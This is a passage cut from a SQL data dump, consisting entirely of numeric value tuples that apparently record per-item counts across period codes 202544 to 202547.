,1,'202544',10),(3124,1,'202544',10),(3251,1,'202544',10),(3275,1,'202544',10),(3290,1,'202544',10),(3479,1,'202544',10),(3534,1,'202544',10),(3714,1,'202544',10),(3731,1,'202544',10),(3752,1,'202544',10),(4329,1,'202544',10),(4332,1,'202544',10),(4341,1,'202544',10),(4368,1,'202544',10),(4420,1,'202544',10),(4514,1,'202544',10),(4566,1,'202544',10),(4645,1,'202544',10),(4709,1,'202544',10),(4759,1,'202544',10),(5134,1,'202544',10),(5276,1,'202544',10),(5356,1,'202544',10),(469,1,'202544',11),(473,1,'202544',11),(480,1,'202544',11),(1606,1,'202544',11),(1734,1,'202544',11),(2248,1,'202544',11),(2309,1,'202544',11),(2956,1,'202544',11),(3006,1,'202544',11),(3063,1,'202544',11),(3127,1,'202544',11),(3430,1,'202544',11),(3489,1,'202544',11),(3721,1,'202544',11),(3738,1,'202544',11),(4335,1,'202544',11),(4338,1,'202544',11),(4408,1,'202544',11),(4457,1,'202544',11),(4546,1,'202544',11),(4651,1,'202544',11),(4691,1,'202544',11),(4703,1,'202544',11),(4706,1,'202544',11),(4756,1,'202544',11),(4768,1,'202544',11),(4771,1,'202544',11),(4776,1,'202544',11),(5125,1,'202544',11),(5301,1,'202544',11),(5383,1,'202544',11),(5415,1,'202544',11),(5561,1,'202544',11),(471,1,'202544',12),(1602,1,'202544',12),(1711,1,'202544',12),(1747,1,'202544',12),(2911,1,'202544',12),(3079,1,'202544',12),(3259,1,'202544',12),(3316,1,'202544',12),(3438,1,'202544',12),(3746,1,'202544',12),(3764,1,'202544',12),(3774,1,'202544',12),(4323,1,'202544',12),(4377,1,'202544',12),(4424,1,'202544',12),(4654,1,'202544',12),(4657,1,'202544',12),(4681,1,'202544',12),(4688,1,'202544',12),(4750,1,'202544',12),(4983,1,'202544',12),(5028,1,'202544',12),(5062,1,'202544',12),(5314,1,'202544',12),(5317,1,'202544',12),(472,1,'202544',13),(487,1,'202544',13),(1588,1,'202544',13),(1743,1,'202544',13),(2156,1,'202544',13),(2769,1,'202544',13),(2804,1,'202544',13),(2809,1,'202544',13),(3038,1,'202544',13),(3710,1,'202544',13),(3742,1,'202544',13),(4542,1,'202544',13),(4582,1,'202544',13),(4660,1,'202544',13),(4674,1,'202544',13),(4697,1,'202544',13),(4741,1,'202544',13),(4747,1,'202544',13),(4765,1,'202544',13),(5153,1,'202544',13),(5363,1,'202544',13),(5582,1,'202544',13),(110,1,'202544',14),(1612,1,'202544',14),(1741,1,'202544',14),(1766,1,'202544',14),(2658,1,'202544',14),(3307,1,'202544',14),(3541,1,'202544',14),(3724,1,'202544',14),(4275,1,'202544',14),(4517,1,'202544',14),(4591,1,'202544',14),(4612,1,'202544',14),(4744,1,'202544',14),(5076,1,'202544',14),(5259,1,'202544',14),(5467,1,'202544',14),(3034,1,'202544',15),(3045,1,'202544',15),(3271,1,'202544',15),(3273,1,'202544',15),(4685,1,'202544',15),(5320,1,'202544',15),(5353,1,'202544',15),(5515,1,'202544',15),(5567,1,'202544',15),(5585,1,'202544',15),(1701,1,'202544',16),(1718,1,'202544',16),(1722,1,'202544',16),(3023,1,'202544',16),(3069,1,'202544',16),(3777,1,'202544',16),(4663,1,'202544',16),(4977,1,'202544',16),(5307,1,'202544',16),(5425,1,'202544',16),(1600,1,'202544',17),(1705,1,'202544',17),(3735,1,'202544',17),(4556,1,'202544',17),(4753,1,'202544',17),(5412,1,'202544',17),(5489,1,'202544',17),(5578,1,'202544',17),(87,1,'202544',18),(1598,1,'202544',18),(2558,1,'202544',18),(3313,1,'202544',18),(4301,1,'202544',18),(4712,1,'202544',18),(4870,1,'202544',18),(1770,1,'202544',19),(2297,1,'202544',19),(4373,1,'202544',19),(5433,1,'202544',19),(5461,1,'202544',19),(5512,1,'202544',19),(3486,1,'202544',20),(4400,1,'202544',20),(4648,1,'202544',20),(5464,1,'202544',20),(5601,1,'202544',20),(335,1,'202544',21),(1544,1,'202544',21),(1596,1,'202544',21),(3297,1,'202544',21),(4930,1,'202544',21),(5042,1,'202544',21),(5163,1,'202544',21),(5280,1,'202544',21),(5436,1,'202544',21),(74,1,'202544',22),(84,1,'202544',22),(3749,1,'202544',22),(5492,1,'202544',22),(1728,1,'202544',23),(2503,1,'202544',23),(2993,1,'202544',23),(4520,1,'202544',23),(468,1,'202544',24),(474,1,'202544',24),(5441,1,'202544',24),(2704,1,'202544',25),(5400,1,'202544',25),(5598,1,'202544',25),(1586,1,'202544',26),(2775,1,'202544',26),(5454,1,'202544',26),(5457,1,'202544',26),(108,1,'202544',27),(5409,1,'202544',27),(488,1,'202544',28),(5449,1,'202544',28),(5428,1,'202544',29),(5502,1,'202544',29),(467,1,'202544',31),(1608,1,'202544',32),(3102,1,'202544',32),(5406,1,'202544',32),(5570,1,'202544',32),(5593,1,'202544',32),(3083,1,'202544',33),(2904,1,'202544',34),(91,1,'202544',35),(5397,1,'202544',36),(4238,1,'202544',37),(3781,1,'202544',40),(2813,1,'202544',41),(3060,1,'202544',44),(76,1,'202544',46),(1778,1,'202544',46),(5420,1,'202544',46),(72,1,'202544',54),(89,1,'202544',56),(5605,1,'202544',62),(1582,1,'202544',67),(68,1,'202544',78),(470,1,'202544',119),(80,1,'202544',127),(9,1,'202544',2301),(3278,1,'202545',3),(4685,1,'202545',3),(5067,1,'202545',3),(106,1,'202545',4),(476,1,'202545',4),(484,1,'202545',4),(1592,1,'202545',4),(2063,1,'202545',4),(2751,1,'202545',4),(2993,1,'202545',4),(3041,1,'202545',4),(3243,1,'202545',4),(3265,1,'202545',4),(3285,1,'202545',4),(3479,1,'202545',4),(4368,1,'202545',4),(4382,1,'202545',4),(4387,1,'202545',4),(4440,1,'202545',4),(4587,1,'202545',4),(4797,1,'202545',4),(5046,1,'202545',4),(485,1,'202545',5),(1705,1,'202545',5),(1772,1,'202545',5),(1780,1,'202545',5),(2161,1,'202545',5),(2293,1,'202545',5),(2296,1,'202545',5),(2609,1,'202545',5),(2965,1,'202545',5),(3006,1,'202545',5),(3249,1,'202545',5),(3724,1,'202545',5),(3727,1,'202545',5),(4404,1,'202545',5),(4424,1,'202545',5),(4428,1,'202545',5),(4444,1,'202545',5),(4546,1,'202545',5),(4566,1,'202545',5),(4771,1,'202545',5),(4792,1,'202545',5),(4862,1,'202545',5),(4897,1,'202545',5),(5033,1,'202545',5),(5050,1,'202545',5),(5256,1,'202545',5),(5264,1,'202545',5),(5310,1,'202545',5),(5320,1,'202545',5),(5374,1,'202545',5),(5383,1,'202545',5),(102,1,'202545',6),(478,1,'202545',6),(480,1,'202545',6),(481,1,'202545',6),(483,1,'202545',6),(1699,1,'202545',6),(1707,1,'202545',6),(1726,1,'202545',6),(1749,1,'202545',6),(2152,1,'202545',6),(2989,1,'202545',6),(3092,1,'202545',6),(3096,1,'202545',6),(3097,1,'202545',6),(3240,1,'202545',6),(3257,1,'202545',6),(3280,1,'202545',6),(3541,1,'202545',6),(3742,1,'202545',6),(4332,1,'202545',6),(4373,1,'202545',6),(4377,1,'202545',6),(4396,1,'202545',6),(4408,1,'202545',6),(4436,1,'202545',6),(4448,1,'202545',6),(4657,1,'202545',6),(4691,1,'202545',6),(4697,1,'202545',6),(4700,1,'202545',6),(4706,1,'202545',6),(4744,1,'202545',6),(4747,1,'202545',6),(4765,1,'202545',6),(4776,1,'202545',6),(4888,1,'202545',6),(5042,1,'202545',6),(5271,1,'202545',6),(482,1,'202545',7),(1590,1,'202545',7),(1695,1,'202545',7),(1713,1,'202545',7),(1734,1,'202545',7),(1768,1,'202545',7),(1770,1,'202545',7),(1774,1,'202545',7),(1782,1,'202545',7),(2150,1,'202545',7),(2159,1,'202545',7),(2165,1,'202545',7),(2457,1,'202545',7),(2558,1,'202545',7),(3004,1,'202545',7),(3030,1,'202545',7),(3034,1,'202545',7),(3063,1,'202545',7),(3066,1,'202545',7),(3090,1,'202545',7),(3107,1,'202545',7),(3109,1,'202545',7),(3229,1,'202545',7),(3245,1,'202545',7),(3259,1,'202545',7),(3275,1,'202545',7),(3282,1,'202545',7),(3430,1,'202545',7),(3438,1,'202545',7),(3531,1,'202545',7),(4338,1,'202545',7),(4357,1,'202545',7),(4591,1,'202545',7),(4756,1,'202545',7),(4858,1,'202545',7),(4996,1,'202545',7),(5028,1,'202545',7),(5248,1,'202545',7),(5307,1,'202545',7),(5334,1,'202545',7),(5359,1,'202545',7),(5363,1,'202545',7),(5467,1,'202545',7),(471,1,'202545',8),(479,1,'202545',8),(1596,1,'202545',8),(1697,1,'202545',8),(1711,1,'202545',8),(1718,1,'202545',8),(1720,1,'202545',8),(1737,1,'202545',8),(1747,1,'202545',8),(1751,1,'202545',8),(2154,1,'202545',8),(2252,1,'202545',8),(3079,1,'202545',8),(3087,1,'202545',8),(3124,1,'202545',8),(3226,1,'202545',8),(3247,1,'202545',8),(3263,1,'202545',8),(3269,1,'202545',8),(3273,1,'202545',8),(3498,1,'202545',8),(3534,1,'202545',8),(3710,1,'202545',8),(3714,1,'202545',8),(3735,1,'202545',8),(3738,1,'202545',8),(4238,1,'202545',8),(4301,1,'202545',8),(4363,1,'202545',8),(4432,1,'202545',8),(4457,1,'202545',8),(4517,1,'202545',8),(4524,1,'202545',8),(4648,1,'202545',8),(4677,1,'202545',8),(4709,1,'202545',8),(4866,1,'202545',8),(4878,1,'202545',8),(4893,1,'202545',8),(5020,1,'202545',8),(5071,1,'202545',8),(5080,1,'202545',8),(5146,1,'202545',8),(5253,1,'202545',8),(5268,1,'202545',8),(5289,1,'202545',8),(5298,1,'202545',8),(5378,1,'202545',8),(5609,1,'202545',8),(469,1,'202545',9),(477,1,'202545',9),(1584,1,'202545',9),(1715,1,'202545',9),(1730,1,'202545',9),(1741,1,'202545',9),(1766,1,'202545',9),(2148,1,'202545',9),(2156,1,'202545',9),(2178,1,'202545',9),(2248,1,'202545',9),(2748,1,'202545',9),(2911,1,'202545',9),(2991,1,'202545',9),(3027,1,'202545',9),(3072,1,'202545',9),(3104,1,'202545',9),(3251,1,'202545',9),(3253,1,'202545',9),(3482,1,'202545',9),(3746,1,'202545',9),(4275,1,'202545',9),(4326,1,'202545',9),(4329,1,'202545',9),(4335,1,'202545',9),(4542,1,'202545',9),(4551,1,'202545',9),(4582,1,'202545',9),(4608,1,'202545',9),(4654,1,'202545',9),(4668,1,'202545',9),(4674,1,'202545',9),(4768,1,'202545',9),(4802,1,'202545',9),(4870,1,'202545',9),(4883,1,'202545',9),(4976,1,'202545',9),(5101,1,'202545',9),(5128,1,'202545',9),(5153,1,'202545',9),(5163,1,'202545',9),(5323,1,'202545',9),(5326,1,'202545',9),(488,1,'202545',10),(1604,1,'202545',10),(1606,1,'202545',10),(1709,1,'202545',10),(1739,1,'202545',10),(1743,1,'202545',10),(1776,1,'202545',10),(2769,1,'202545',10),(2801,1,'202545',10),(2964,1,'202545',10),(3261,1,'202545',10),(3267,1,'202545',10),(3287,1,'202545',10),(3489,1,'202545',10),(3721,1,'202545',10),(3764,1,'202545',10),(4323,1,'202545',10),(4391,1,'202545',10),(4420,1,'202545',10),(4520,1,'202545',10),(4694,1,'202545',10),(4712,1,'202545',10),(4874,1,'202545',10),(4988,1,'202545',10),(5037,1,'202545',10),(5122,1,'202545',10),(5137,1,'202545',10),(5140,1,'202545',10),(5295,1,'202545',10),(5304,1,'202545',10),(5314,1,'202545',10),(5317,1,'202545',10),(5330,1,'202545',10),(5353,1,'202545',10),(5356,1,'202545',10),(5472,1,'202545',10),(472,1,'202545',11),(1724,1,'202545',11),(1732,1,'202545',11),(3045,1,'202545',11),(3117,1,'202545',11),(3271,1,'202545',11),(3316,1,'202545',11),(3731,1,'202545',11),(3771,1,'202545',11),(4454,1,'202545',11),(4645,1,'202545',11),(4681,1,'202545',11),(4703,1,'202545',11),(4750,1,'202545',11),(4762,1,'202545',11),(5024,1,'202545',11),(5134,1,'202545',11),(5301,1,'202545',11),(486,1,'202545',12),(570,1,'202545',12),(1610,1,'202545',12),(1703,1,'202545',12),(2617,1,'202545',12),(2658,1,'202545',12),(2804,1,'202545',12),(3307,1,'202545',12),(4341,1,'202545',12),(4514,1,'202545',12),(4660,1,'202545',12),(4688,1,'202545',12),(4753,1,'202545',12),(4759,1,'202545',12),(4977,1,'202545',12),(5157,1,'202545',12),(5492,1,'202545',12),(5582,1,'202545',12),(1598,1,'202545',13),(1614,1,'202545',13),(3005,1,'202545',13),(3127,1,'202545',13),(3290,1,'202545',13),(3777,1,'202545',13),(4400,1,'202545',13),(4416,1,'202545',13),(4651,1,'202545',13),(4663,1,'202545',13),(4983,1,'202545',13),(5054,1,'202545',13),(5131,1,'202545',13),(5292,1,'202545',13),(5567,1,'202545',13),(5585,1,'202545',13),(473,1,'202545',14),(1588,1,'202545',14),(1594,1,'202545',14),(1722,1,'202545',14),(1745,1,'202545',14),(2309,1,'202545',14),(2956,1,'202545',14),(3038,1,'202545',14),(3297,1,'202545',14),(3486,1,'202545',14),(3749,1,'202545',14),(4412,1,'202545',14),(4980,1,'202545',14),(5276,1,'202545',14),(5425,1,'202545',14),(5461,1,'202545',14),(5489,1,'202545',14),(1602,1,'202545',15),(3023,1,'202545',15),(3774,1,'202545',15),(4529,1,'202545',15),(4741,1,'202545',15),(5058,1,'202545',15),(5259,1,'202545',15),(5400,1,'202545',15),(5415,1,'202545',15),(5433,1,'202545',15),(1612,1,'202545',16),(1701,1,'202545',16),(3083,1,'202545',16),(4722,1,'202545',16),(5125,1,'202545',16),(5464,1,'202545',16),(5593,1,'202545',16),(110,1,'202545',17),(1544,1,'202545',17),(4556,1,'202545',17),(5062,1,'202545',17),(5076,1,'202545',17),(5512,1,'202545',17),(2809,1,'202545',18),(4612,1,'202545',18),(2297,1,'202545',19),(3313,1,'202545',19),(5457,1,'202545',19),(5626,1,'202545',19),(487,1,'202545',20),(1586,1,'202545',20),(1600,1,'202545',20),(3102,1,'202545',20),(3752,1,'202545',20),(5280,1,'202545',20),(5454,1,'202545',20),(5515,1,'202545',20),(5578,1,'202545',20),(5409,1,'202545',21),(5412,1,'202545',21),(468,1,'202545',22),(2813,1,'202545',22),(5397,1,'202545',22),(5561,1,'202545',22),(1728,1,'202545',23),(2775,1,'202545',23),(4930,1,'202545',23),(5441,1,'202545',23),(335,1,'202545',24),(1608,1,'202545',24),(2704,1,'202545',24),(5436,1,'202545',24),(5449,1,'202545',24),(2503,1,'202545',25),(74,1,'202545',26),(474,1,'202545',26),(5428,1,'202545',26),(5570,1,'202545',26),(2904,1,'202545',27),(3060,1,'202545',27),(5598,1,'202545',27),(108,1,'202545',28),(1778,1,'202545',28),(5406,1,'202545',28),(5601,1,'202545',28),(76,1,'202545',33),(84,1,'202545',34),(91,1,'202545',34),(467,1,'202545',36),(5502,1,'202545',39),(3781,1,'202545',42),(3069,1,'202545',44),(89,1,'202545',45),(1582,1,'202545',52),(5420,1,'202545',55),(72,1,'202545',56),(5605,1,'202545',59),(470,1,'202545',76),(87,1,'202545',84),(68,1,'202545',92),(80,1,'202545',1818),(9,1,'202545',3847),(106,1,'202546',3),(4858,1,'202546',4),(1697,1,'202546',5),(1776,1,'202546',5),(3079,1,'202546',5),(3107,1,'202546',5),(3275,1,'202546',5),(3280,1,'202546',5),(3285,1,'202546',5),(4797,1,'202546',5),(4888,1,'202546',5),(5020,1,'202546',5),(1705,1,'202546',6),(1720,1,'202546',6),(1737,1,'202546',6),(1768,1,'202546',6),(1770,1,'202546',6),(1782,1,'202546',6),(3245,1,'202546',6),(3287,1,'202546',6),(4357,1,'202546',6),(4382,1,'202546',6),(4396,1,'202546',6),(4612,1,'202546',6),(4792,1,'202546',6),(4802,1,'202546',6),(479,1,'202546',7),(482,1,'202546',7),(488,1,'202546',7),(1713,1,'202546',7),(1734,1,'202546',7),(1751,1,'202546',7),(2063,1,'202546',7),(2156,1,'202546',7),(2161,1,'202546',7),(2252,1,'202546',7),(2293,1,'202546',7),(2296,1,'202546',7),(2964,1,'202546',7),(2991,1,'202546',7),(3109,1,'202546',7),(3127,1,'202546',7),(3261,1,'202546',7),(3273,1,'202546',7),(4238,1,'202546',7),(4391,1,'202546',7),(4556,1,'202546',7),(4587,1,'202546',7),(4591,1,'202546',7),(4608,1,'202546',7),(4654,1,'202546',7),(4685,1,'202546',7),(4700,1,'202546',7),(4996,1,'202546',7),(5024,1,'202546',7),(5028,1,'202546',7),(5042,1,'202546',7),(5054,1,'202546',7),(5058,1,'202546',7),(5131,1,'202546',7),(5472,1,'202546',7),(471,1,'202546',8),(476,1,'202546',8),(1711,1,'202546',8),(1715,1,'202546',8),(1726,1,'202546',8),(1732,1,'202546',8),(2150,1,'202546',8),(2748,1,'202546',8),(3243,1,'202546',8),(3249,1,'202546',8),(3259,1,'202546',8),(3263,1,'202546',8),(3498,1,'202546',8),(3738,1,'202546',8),(4275,1,'202546',8),(4412,1,'202546',8),(4677,1,'202546',8),(4697,1,'202546',8),(4706,1,'202546',8),(4747,1,'202546',8),(4883,1,'202546',8),(5046,1,'202546',8),(5140,1,'202546',8),(5330,1,'202546',8),(5334,1,'202546',8),(5359,1,'202546',8),(5363,1,'202546',8),(5378,1,'202546',8),(486,1,'202546',9),(1709,1,'202546',9),(1739,1,'202546',9),(1743,1,'202546',9),(1774,1,'202546',9),(2148,1,'202546',9),(2154,1,'202546',9),(2248,1,'202546',9),(2617,1,'202546',9),(3072,1,'202546',9),(3096,1,'202546',9),(3097,1,'202546',9),(3247,1,'202546',9),(3267,1,'202546',9),(3269,1,'202546',9),(3316,1,'202546',9),(3534,1,'202546',9),(3721,1,'202546',9),(3735,1,'202546',9),(4301,1,'202546',9),(4338,1,'202546',9),(4368,1,'202546',9),(4387,1,'202546',9),(4424,1,'202546',9),(4428,1,'202546',9),(4432,1,'202546',9),(4444,1,'202546',9),(4448,1,'202546',9),(4514,1,'202546',9),(4645,1,'202546',9),(4703,1,'202546',9),(4862,1,'202546',9),(4866,1,'202546',9),(4870,1,'202546',9),(4897,1,'202546',9),(4976,1,'202546',9),(5037,1,'202546',9),(5050,1,'202546',9),(5067,1,'202546',9),(5301,1,'202546',9),(110,1,'202546',10),(478,1,'202546',10),(480,1,'202546',10),(485,1,'202546',10),(1699,1,'202546',10),(1718,1,'202546',10),(1745,1,'202546',10),(1747,1,'202546',10),(2178,1,'202546',10),(2558,1,'202546',10),(2801,1,'202546',10),(2911,1,'202546',10),(3006,1,'202546',10),(3092,1,'202546',10),(3226,1,'202546',10),(3240,1,'202546',10),(3251,1,'202546',10),(3257,1,'202546',10),(3265,1,'202546',10),(3271,1,'202546',10),(3282,1,'202546',10),(3290,1,'202546',10),(3531,1,'202546',10),(3727,1,'202546',10),(3742,1,'202546',10),(3749,1,'202546',10),(4323,1,'202546',10),(4326,1,'202546',10),(4329,1,'202546',10),(4400,1,'202546',10),(4420,1,'202546',10),(4582,1,'202546',10),(4668,1,'202546',10),(4709,1,'202546',10),(4744,1,'202546',10),(4878,1,'202546',10),(4988,1,'202546',10),(5268,1,'202546',10),(5353,1,'202546',10),(5374,1,'202546',10),(483,1,'202546',11),(484,1,'202546',11),(1701,1,'202546',11),(1703,1,'202546',11),(1722,1,'202546',11),(2159,1,'202546',11),(2658,1,'202546',11),(2751,1,'202546',11),(2809,1,'202546',11),(2993,1,'202546',11),(3005,1,'202546',11),(3063,1,'202546',11),(3066,1,'202546',11),(3087,1,'202546',11),(3104,1,'202546',11),(3124,1,'202546',11),(3229,1,'202546',11),(3278,1,'202546',11),(3307,1,'202546',11),(3710,1,'202546',11),(3731,1,'202546',11),(3771,1,'202546',11),(4332,1,'202546',11),(4363,1,'202546',11),(4373,1,'202546',11),(4404,1,'202546',11),(4440,1,'202546',11),(4517,1,'202546',11),(4524,1,'202546',11),(4542,1,'202546',11),(4566,1,'202546',11),(4674,1,'202546',11),(4691,1,'202546',11),(4756,1,'202546',11),(4771,1,'202546',11),(5080,1,'202546',11),(5101,1,'202546',11),(5253,1,'202546',11),(5298,1,'202546',11),(5323,1,'202546',11),(5383,1,'202546',11),(472,1,'202546',12),(1707,1,'202546',12),(1724,1,'202546',12),(1741,1,'202546',12),(1749,1,'202546',12),(1778,1,'202546',12),(2956,1,'202546',12),(2965,1,'202546',12),(2989,1,'202546',12),(3023,1,'202546',12),(3034,1,'202546',12),(4416,1,'202546',12),(4454,1,'202546',12),(4551,1,'202546',12),(4657,1,'202546',12),(4741,1,'202546',12),(4762,1,'202546',12),(4765,1,'202546',12),(4874,1,'202546',12),(4893,1,'202546',12),(4980,1,'202546',12),(5033,1,'202546',12),(5071,1,'202546',12),(5128,1,'202546',12),(5137,1,'202546',12),(5153,1,'202546',12),(5271,1,'202546',12),(5292,1,'202546',12),(5304,1,'202546',12),(5314,1,'202546',12),(5320,1,'202546',12),(5467,1,'202546',12),(477,1,'202546',13),(481,1,'202546',13),(1592,1,'202546',13),(1606,1,'202546',13),(1614,1,'202546',13),(1772,1,'202546',13),(2609,1,'202546',13),(2769,1,'202546',13),(3041,1,'202546',13),(3313,1,'202546',13),(3479,1,'202546',13),(3489,1,'202546',13),(3714,1,'202546',13),(3764,1,'202546',13),(3777,1,'202546',13),(4335,1,'202546',13),(4341,1,'202546',13),(4377,1,'202546',13),(4520,1,'202546',13),(4529,1,'202546',13),(4546,1,'202546',13),(4651,1,'202546',13),(4712,1,'202546',13),(4753,1,'202546',13),(4768,1,'202546',13),(4776,1,'202546',13),(5062,1,'202546',13),(5125,1,'202546',13),(5280,1,'202546',13),(5289,1,'202546',13),(5310,1,'202546',13),(5317,1,'202546',13),(5326,1,'202546',13),(5356,1,'202546',13),(5454,1,'202546',13),(5585,1,'202546',13),(5609,1,'202546',13),(1695,1,'202546',14),(1730,1,'202546',14),(2152,1,'202546',14),(2804,1,'202546',14),(3004,1,'202546',14),(3027,1,'202546',14),(3038,1,'202546',14),(3297,1,'202546',14),(3430,1,'202546',14),(3438,1,'202546',14),(3541,1,'202546',14),(4408,1,'202546',14),(4648,1,'202546',14),(4688,1,'202546',14),(5146,1,'202546',14),(5256,1,'202546',14),(5264,1,'202546',14),(5295,1,'202546',14),(5567,1,'202546',14),(473,1,'202546',15),(2165,1,'202546',15),(3045,1,'202546',15),(3482,1,'202546',15),(3746,1,'202546',15),(3774,1,'202546',15),(4663,1,'202546',15),(4694,1,'202546',15),(4722,1,'202546',15),(4759,1,'202546',15),(5122,1,'202546',15),(5276,1,'202546',15),(5433,1,'202546',15),(5492,1,'202546',15),(5582,1,'202546',15),(570,1,'202546',16),(1596,1,'202546',16),(1598,1,'202546',16),(1766,1,'202546',16),(2309,1,'202546',16),(3090,1,'202546',16),(3486,1,'202546',16),(4660,1,'202546',16),(4750,1,'202546',16),(5134,1,'202546',16),(5601,1,'202546',16),(102,1,'202546',17),(469,1,'202546',17),(1610,1,'202546',17),(3117,1,'202546',17),(4977,1,'202546',17),(5157,1,'202546',17),(5248,1,'202546',17),(5425,1,'202546',17),(74,1,'202546',18),(1590,1,'202546',18),(1780,1,'202546',18),(2457,1,'202546',18),(3083,1,'202546',18),(3724,1,'202546',18),(4457,1,'202546',18),(5076,1,'202546',18),(5259,1,'202546',18),(5307,1,'202546',18),(5415,1,'202546',18),(5449,1,'202546',18),(1594,1,'202546',19),(1600,1,'202546',19),(1602,1,'202546',19),(1612,1,'202546',19),(3102,1,'202546',19),(4436,1,'202546',19),(4681,1,'202546',19),(5400,1,'202546',19),(5461,1,'202546',19),(474,1,'202546',20),(1604,1,'202546',20),(1728,1,'202546',20),(2297,1,'202546',20),(2775,1,'202546',20),(4983,1,'202546',20),(5163,1,'202546',20),(5436,1,'202546',20),(5464,1,'202546',20),(335,1,'202546',21),(5412,1,'202546',21),(5515,1,'202546',21),(5578,1,'202546',21),(3030,1,'202546',22),(1584,1,'202546',23),(1588,1,'202546',23),(5457,1,'202546',23),(5512,1,'202546',23),(5570,1,'202546',23),(84,1,'202546',24),(468,1,'202546',24),(5489,1,'202546',24),(487,1,'202546',25),(4930,1,'202546',25),(5502,1,'202546',25),(5561,1,'202546',25),(1586,1,'202546',27),(1608,1,'202546',27),(2813,1,'202546',27),(2904,1,'202546',27),(5593,1,'202546',27),(5626,1,'202546',27),(3069,1,'202546',28),(3781,1,'202546',29),(5397,1,'202546',30),(5441,1,'202546',30),(91,1,'202546',31),(2503,1,'202546',31),(108,1,'202546',32),(5598,1,'202546',32),(3060,1,'202546',34),(3752,1,'202546',34),(5409,1,'202546',35),(1544,1,'202546',37),(87,1,'202546',39),(5406,1,'202546',39),(3253,1,'202546',40),(76,1,'202546',42),(5428,1,'202546',43),(1582,1,'202546',44),(467,1,'202546',47),(2704,1,'202546',49),(470,1,'202546',56),(5420,1,'202546',60),(89,1,'202546',63),(72,1,'202546',64),(5605,1,'202546',71),(68,1,'202546',93),(80,1,'202546',927),(9,1,'202546',3041),(476,1,'202547',1),(479,1,'202547',1),(484,1,'202547',1),(3240,1,'202547',1),(3245,1,'202547',1),(3257,1,'202547',1),(3263,1,'202547',1),(3265,1,'202547',1),(3269,1,'202547',1),(3273,1,'202547',1),(3275,1,'202547',1),(3738,1,'202547',1),(4326,1,'202547',1),(4368,1,'202547',1),(4396,1,'202547',1),(4591,1,'202547',1),(4759,1,'202547',1),(4797,1,'202547',1),(4802,1,'202547',1),(4858,1,'202547',1),(4883,1,'202547',1),(5046,1,'202547',1),(5248,1,'202547',1),(5330,1,'202547',1),(102,1,'202547',2),(106,1,'202547',2),(471,1,'202547',2),(483,1,'202547',2),(1596,1,'202547',2),(1707,1,'202547',2),(1711,1,'202547',2),(1743,1,'202547',2),(1747,1,'202547',2),(2617,1,'202547',2),(2751,1,'202547',2),(2989,1,'202547',2),(3063,1,'202547',2),(3079,1,'202547',2),(3090,1,'202547',2),(3092,1,'202547',2),(3534,1,'202547',2),(4323,1,'202547',2),(4391,1,'202547',2),(4412,1,'202547',2),(4428,1,'202547',2),(4444,1,'202547',2),(4517,1,'202547',2),(4765,1,'202547',2),(4792,1,'202547',2),(4870,1,'202547',2),(5037,1,'202547',2),(5042,1,'202547',2),(5353,1,'202547',2),(480,1,'202547',3),(486,1,'202547',3),(488,1,'202547',3),(1592,1,'202547',3),(1699,1,'202547',3),(1709,1,'202547',3),(1726,1,'202547',3),(2293,1,'202547',3),(3005,1,'202547',3),(3226,1,'202547',3),(3229,1,'202547',3),(3243,1,'202547',3),(3249,1,'202547',3),(3259,1,'202547',3),(3285,1,'202547',3),(3541,1,'202547',3),(4301,1,'202547',3),(4416,1,'202547',3),(4454,1,'202547',3),(4524,1,'202547',3),(4542,1,'202547',3),(4685,1,'202547',3),(4691,1,'202547',3),(4741,1,'202547',3),(4747,1,'202547',3),(4771,1,'202547',3),(4862,1,'202547',3),(4866,1,'202547',3),(4988,1,'202547',3),(5028,1,'202547',3),(5050,1,'202547',3),(5253,1,'202547',3),(5295,1,'202547',3),(5334,1,'202547',3),(478,1,'202547',4),(482,1,'202547',4),(1718,1,'202547',4),(1720,1,'202547',4),(1730,1,'202547',4),(1732,1,'202547',4),(1745,1,'202547',4),(1749,1,'202547',4),(1782,1,'202547',4),(2156,1,'202547',4),(2159,1,'202547',4),(2248,1,'202547',4),(2558,1,'202547',4),(3267,1,'202547',4),(3271,1,'202547',4),(3278,1,'202547',4),(3287,1,'202547',4),(3498,1,'202547',4),(3531,1,'202547',4),(4357,1,'202547',4),(4363,1,'202547',4),(4373,1,'202547',4),(4408,1,'202547',4),(4648,1,'202547',4),(5058,1,'202547',4),(5080,1,'202547',4),(5256,1,'202547',4),(5276,1,'202547',4),(472,1,'202547',5),(485,1,'202547',5),(1590,1,'202547',5),(1715,1,'202547',5),(1741,1,'202547',5),(1768,1,'202547',5),(1772,1,'202547',5),(1774,1,'202547',5),(2063,1,'202547',5),(2748,1,'202547',5),(2911,1,'202547',5),(2965,1,'202547',5),(3104,1,'202547',5),(3251,1,'202547',5),(3261,1,'202547',5),(3290,1,'202547',5),(3486,1,'202547',5),(3710,1,'202547',5),(3731,1,'202547',5),(3742,1,'202547',5),(3746,1,'202547',5),(4275,1,'202547',5),(4332,1,'202547',5),(4338,1,'202547',5),(4377,1,'202547',5),(4382,1,'202547',5),(4432,1,'202547',5),(4448,1,'202547',5),(4608,1,'202547',5),(4677,1,'202547',5),(4694,1,'202547',5),(4703,1,'202547',5),(4706,1,'202547',5),(4762,1,'202547',5),(5020,1,'202547',5),(5067,1,'202547',5),(5101,1,'202547',5),(5137,1,'202547',5),(5146,1,'202547',5),(5326,1,'202547',5),(5356,1,'202547',5),(5374,1,'202547',5),(5378,1,'202547',5),(477,1,'202547',6),(481,1,'202547',6),(1697,1,'202547',6),(1703,1,'202547',6),(1705,1,'202547',6),(1722,1,'202547',6),(2150,1,'202547',6),(2152,1,'202547',6),(2154,1,'202547',6),(2161,1,'202547',6),(2165,1,'202547',6),(2801,1,'202547',6),(2964,1,'202547',6),(3006,1,'202547',6),(3034,1,'202547',6),(3087,1,'202547',6),(3107,1,'202547',6),(3127,1,'202547',6),(3714,1,'202547',6),(3735,1,'202547',6),(3752,1,'202547',6),(3771,1,'202547',6),(3774,1,'202547',6),(4424,1,'202547',6),(4440,1,'202547',6),(4566,1,'202547',6),(4645,1,'202547',6),(4651,1,'202547',6),(4657,1,'202547',6),(4674,1,'202547',6),(4753,1,'202547',6),(4756,1,'202547',6),(4768,1,'202547',6),(4878,1,'202547',6),(4888,1,'202547',6),(5122,1,'202547',6),(5131,1,'202547',6),(5153,1,'202547',6),(5264,1,'202547',6),(5271,1,'202547',6),(5289,1,'202547',6),(5298,1,'202547',6),(5304,1,'202547',6),(5314,1,'202547',6),(5383,1,'202547',6),(5467,1,'202547',6),(5609,1,'202547',6),(5626,1,'202547',6),(1734,1,'202547',7),(1739,1,'202547',7),(2148,1,'202547',7),(2296,1,'202547',7),(2457,1